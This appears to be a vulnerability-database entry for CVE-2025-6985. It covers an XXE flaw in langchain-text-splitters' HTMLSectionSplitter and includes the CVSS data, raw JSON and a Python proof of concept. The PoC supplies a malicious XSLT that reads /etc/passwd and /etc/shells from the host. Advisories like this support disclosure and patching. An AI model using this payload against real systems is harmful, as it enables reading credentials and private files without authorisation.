Security Vulnerability Report
中文
CVE-2025-6985 CVSS 7.5 HIGH

CVE-2025-6985

Published: 2025-10-06 18:15:53
Last Modified: 2026-04-15 00:35:42

Description

The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

langchain-text-splitters == 0.3.8
lxml <= 4.9.x(默认实体解析)
lxml >= 5.0.0(未配置XSLTAccessControl)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-6985 PoC - XXE via XSLT in langchain-text-splitters # Vulnerability: HTMLSectionSplitter allows arbitrary XSLT parsing without hardening from langchain_text_splitters import HTMLSectionSplitter # Malicious XSLT stylesheet with external entity injection # This XSLT uses document() function to read local files malicious_xslt = """<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xsl:stylesheet [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <output> <file_content>&xxe;</file_content> <!-- Alternative: use document() to read arbitrary files --> <secret_content> <xsl:copy-of select="document('file:///etc/shells')"/> </secret_content> </output> </xsl:template> </xsl:stylesheet>""" # HTML content to be processed html_content = """ <html> <head><title>Test</title></head> <body> <h1>Section Header</h1> <p>This is test content for the splitter.</p> </body> </html> """ # Trigger the vulnerability by providing malicious XSLT splitter = HTMLSectionSplitter( headers_to_split_on=[("h1", "Header 1")], xslt_stylesheet=malicious_xslt # Vulnerable: no sanitization applied ) # Process HTML - this will trigger XXE and read /etc/passwd chunks = splitter.split_text(html_content) for chunk in chunks: print(chunk.page_content) # The output will contain the contents of /etc/passwd

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6985", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:52.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331", "source": "[email protected]"}]}}